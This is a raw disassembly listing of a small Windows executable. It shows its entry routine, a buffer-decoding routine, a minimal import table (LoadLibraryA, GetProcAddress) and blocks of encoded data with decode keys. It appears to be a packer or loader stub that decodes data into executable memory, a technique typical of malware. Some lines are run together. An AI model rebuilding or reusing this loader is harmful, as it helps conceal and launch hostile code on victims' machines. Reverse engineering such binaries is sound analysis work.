loc_401B6E: ; CODE XREF: sub_401AFE+91�j
mov eax, dword_40326C
mov al, [eax+ecx+1800h]
mov edx, dword_4312A0
mov [edx+ecx], al
mov eax, [ebp+var_4]
inc ecx
lea edx, [eax-1800h]
cmp ecx, edx
jb short loc_401B6E
loc_401B91: ; CODE XREF: sub_401AFE+6E�j
mov ecx, dword_4312A0
mov [ecx+eax-1800h], bl
mov eax, [ebp+var_4]
add eax, 0FFFFE800h
push eax
push dword_4312A0
push offset aCdsafreytd ; "cdsafreytd"
call sub_40102B
lea ecx, [ebp+var_8]
push ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFE800h
push ecx
push ebx
push eax
push ebx
call sub_401ABA
push [ebp+var_8]
push eax
push offset aE5gfdevjns ; "e5gfdevjns"
call sub_40102B
add esp, 2Ch
mov dword_40326C, eax
pop ebx
leave
retn
sub_401AFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_524 = byte ptr -524h
var_258 = byte ptr -258h
var_158 = byte ptr -158h
var_78 = byte ptr -78h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 524h
push ebx
push esi
push edi
call sub_401845
call sub_4017A6
test al, al
jnz loc_401D39
push 100h
lea eax, [ebp+var_258]
push eax
xor ebx, ebx
push ebx
call dword_4032E8
lea eax, [ebp+var_258]
push eax
push ebx
call sub_401AFE
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_401160
add esp, 18h
test al, al
jz loc_401D39
push [ebp+var_8]
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_401314
add esp, 10h
push 40h
push 1000h
push eax
push ebx
mov [ebp+var_4], eax
call dword_4032C8
push eax
push [ebp+var_8]
mov dword_4312A8, eax
lea eax, [ebp+var_158]
push eax
push ebx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_78]
push eax
call sub_40138A
push ebx
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_524]
push eax
push ebx
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_258]
push eax
call sub_40156F
add esp, 30h
push [ebp+var_C]
mov ecx, 0B3h
push [ebp+var_10]
lea esi, [ebp+var_524]
sub esp, 2CCh
mov edi, esp
sub esp, 10h
rep movsd
mov edi, esp
lea eax, [ebp+var_258]
push eax
push [ebp+var_4]
lea esi, [ebp+var_38]
push dword_4312A8
movsd
push [ebp+var_8]
movsd
lea eax, [ebp+var_158]
push eax
push ebx
lea eax, [ebp+var_28]
movsd
push eax
lea eax, [ebp+var_78]
push eax
movsd
call sub_40162A
add esp, 304h
push ebx
push [ebp+var_4]
push dword_4312A8
push dword_4312C0
push dword_4312B0
call dword_4032DC
push [ebp+var_4]
test eax, eax
setnz al
push ebx
mov byte_4312B4, al
call sub_401780
pop ecx
pop ecx
loc_401D39: ; CODE XREF: start+18�j start+5D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
start endp
; ---------------------------------------------------------------------------
align 100h
_text ends
; Section 2. (virtual address 00002000)
; Virtual size : 000000A2 ( 162.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00001200
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401845+69�p
; sub_401845+82�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401845+21�p
; sub_401845+38�p ...
; HGLOBAL __stdcall GlobalAlloc(UINT uFlags, SIZE_T dwBytes)
extrn GlobalAlloc:dword ; CODE XREF: sub_401000+8�p
; DATA XREF: sub_401000+8�r
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 40200Ch
align 10h
dword_402010 dd 30h aE5gfdevjns db 'e5gfdevjns',0 ; DATA XREF: sub_401AFE+D3�o
align 10h
aCdsafreytd db 'cdsafreytd',0 ; DATA XREF: sub_401AFE+AF�o
align 4
aT db 'T ',0
align 10h
dd 2 dup(0)
dd 2094h, 2000h, 5 dup(0)
dd 2072h, 2084h, 2064h, 0
dd 6C4701EEh, 6C61626Fh, 6F6C6C41h, 1980063h, 50746547h
dd 41636F72h, 65726464h, 7373h, 6F4C0248h, 694C6461h, 72617262h
dd 4179h, 4E52454Bh, 32334C45h, 6C6C642Eh, 58h dup(0)
_rdata ends
; Section 3. (virtual address 00003000)
; Virtual size : 0002E2C4 ( 189124.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00001400
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 403000h
dword_403000 dd 5C4F7176h, 0C5FC5D95h, 92245E05h, 96AEhdword_403010 dd 65497D67h, 0E8E5588Fh, 9D22740Ch, 5C50A08Eh, 0F5A3h
; DATA XREF: sub_401845+251�o
aZohfnR db 'zohF]',0 ; DATA XREF: sub_401845+D4�o
aWNTrMi db 'W<TR',0
align 4
dd 4D586A66h, 0F6F255ACh, 324008h
dword_403048 dd 49586A63h, 0F6C05994h, 822E5106h, 0AF98haKOfepgGvA db 'K}OFPGV',27h,'',0 ; DATA XREF: sub_401845+25�o
align 4
dword_403068 dd 7C497D67h, 0E5F54E88h, 9F24710Dh, 45498B9Fh, 0
; DATA XREF: sub_401845+19C�o
dword_40307C dd 4C5C7D72h, 0E7FF4EB0h, 0BC38410Ch, 435E838Eh, 0BFh
; DATA XREF: sub_401845+21F�o
dword_403090 dd 795A7D72h, 0FDE25995h, 8427533Fh, 7049AB8Eh, 0
; DATA XREF: sub_401845+1CE�o
dword_4030A4 dd 5C4F7176h, 0D4FC5D95h, 943F5D1Bh, 49749A88h, 0
; DATA XREF: sub_401845+238�o
aWjtEltiW8vjl db 'wjT\l',0Ah ; DATA XREF: sub_401845+86�o
db 'W8\^',0
align 4
dword_4030CC dd 585C6F73h, 0F7E553ADh, 853E700Ch, 425F819Fh, 0
; DATA XREF: sub_4017A6+60�o
dword_4030E0 dd 7C497D73h, 0E5F54E88h, 9F24710Dh, 45498B9Fh, 0
; DATA XREF: sub_401845+151�o
aAKiUgGvA db 'a\kiuGV',27h,'',0 ; DATA XREF: sub_401845+7�o
align 4
dword_403104 dd 5C537763h, 0A4FC5392h, 94255339h, 5E7CB287h, 86C7B3h
; DATA XREF: sub_4017A6+22�o
dword_403118 dd 5C4F7176h, 0C5FC5D95h, 92245E05h, 0aRNNyWX db 'r}N]Y',1Bh,'W*',0 ; DATA XREF: sub_401845+ED�o
align 4
dd 454F7D74h, 0F0F15289h, 9E39620Ch, 42428B88h, 0
dd 5C4F7176h, 0C2FC5D95h, 2E571Bh, 4D587473h, 90h, 5B527463h
dd 0EAF17485h, 2E5E0Dh, 64497D67h, 0E8F15F8Fh, 94265B3Dh
dd 0
dword_40317C dd 44596C4Eh, 0E8F4128Ch, 5, 64497D73h, 0E8F15F8Fh, 94265B3Dh
; DATA XREF: sub_401845+3C�o
dd 0
dword_403198 dd 6C516C72h, 0E9FF5F85h, 822E4019h, 5744AC98h, 91D1A0h
; DATA XREF: sub_401845+106�o
dword_4031AC dd 49586A63h, 0EDD65994h, 0A5705hdword_4031B8 dd 6B516C72h, 0F6E0518Fh, 0B338410Ch, 5457889Eh, 0B4h
; DATA XREF: sub_401845+51�o
dword_4031CC dd 4C5C7D72h, 0E1FC55A6h, 0dword_4031D8 dd 6F516C72h, 0EBD34885h, 94394204h, 5E589D98h, 0F78CE3A8h
; DATA XREF: sub_401845+1B5�o
dd 0CCEB0A55h, 0A2D1967Bh, 0BE9Dh
dword_4031F8 dd 6E497D67h, 0D7F55089h, 2E4800haGbvcnfisugd db 'gbvcnfisugd',0 ; DATA XREF: sub_4017A6+27�o
; sub_401845+C�o
dd 6E497D73h, 0D4F55089h, 85255B06h, 9C8Eh, 7D497D67h
dd 0CAE25993h, 0B02E5F08h, 0
dword_403230 dd 675A7D72h, 0CFFE5990h, 0A4B0Ch, 494B7C41h, 0B6A35590h
; DATA XREF: sub_401845+1EA�o
dd 9D275647h, 0
aRZkmsusW2 db 'r}ZkS"W2',0 ; DATA XREF: sub_401845+9F�o
dword_403258 dd 5C4F7176h, 0D5FC5D95h, 8839571Ch, 96AEhbyte_403268 db 0 ; DATA XREF: sub_401160+3D�w
; sub_40138A+26�w ...
align 4
dword_40326C dd 0 ; sub_401160+9�r ...
dword_403270 dd 0 ; sub_401845+10C�w
dword_403274 dd 0 ; sub_40162A+A5�r ...
dword_403278 dd 0 ; sub_401845+C1�w
dword_40327C dd 0 ; sub_401AFE+4C�r
dword_403280 dd 0 ; sub_401845+F3�w
dword_403284 dd 0 ; sub_401845+23E�w
byte_403288 db 0 ; DATA XREF: sub_401160+11�w
; sub_401160+37�w ...
align 4
dword_40328C dd 0 ; sub_401780�r
dword_403290 dd 0 ; sub_401AFE+28�r
dword_403294 dd 0 ; sub_401ABA+25�r
dword_403298 dd 0 ; sub_401AFE+1B�r
dword_40329C dd 3 dup(0) dword_4032A8 dd 0 dword_4032AC dd 0 dd 2 dup(0)
dword_4032B8 dd 0 dword_4032BC dd 0 ; sub_401ABA+38�r
dd 2 dup(0)
dword_4032C8 dd 0 dword_4032CC dd 0 ; sub_401845+20C�w
dword_4032D0 dd 0 ; sub_401845+1BB�w
dword_4032D4 dd 0 dword_4032D8 dd 0 ; sub_401AFE+52�r
dword_4032DC dd 0 ; sub_401845+A5�w ...
byte_4032E0 db 0 ; DATA XREF: sub_401160+1A�w
; sub_401160+23�w ...
align 4
dword_4032E4 dd 0 ; sub_401845+170�w
dword_4032E8 dd 0 align 10h
byte_4032F0 db 0 ; DATA XREF: sub_40113B+17�w
; sub_401160+7B�o ...
dword_4032F1 dd 0 ; sub_401160+B6�r ...
align 4
dd 4 dup(0)
byte_403308 db 0 ; DATA XREF: sub_401160+A7�w
align 4
dd 9 dup(0)
byte_403330 db 0 ; DATA XREF: sub_401160+56�w
align 4
dd 27h dup(0)
byte_4033D0 db 0 ; DATA XREF: sub_401160+EF�w
align 4
dd 0Bh dup(0)
dd 0B7A6h dup(?)
dword_431298 dd ? ; sub_401845+225�w
dword_43129C dd ? dword_4312A0 dd ? ; sub_401AFE+7C�r ...
dword_4312A4 dd ? ; sub_401845+13E�w
dword_4312A8 dd ? dword_4312AC dd ? ; sub_401845+257�w
dword_4312B0 dd ? ; start+132�r
byte_4312B4 db ? ; DATA XREF: sub_401780+6�w start+147�w
align 4
dword_4312B8 dd ? ; sub_401845+1F0�w
dword_4312BC dd ? ; sub_401160+8B�r ...
dword_4312C0 dd ? ; sub_40162A+7F�w ...
align 200h
_data ends
end start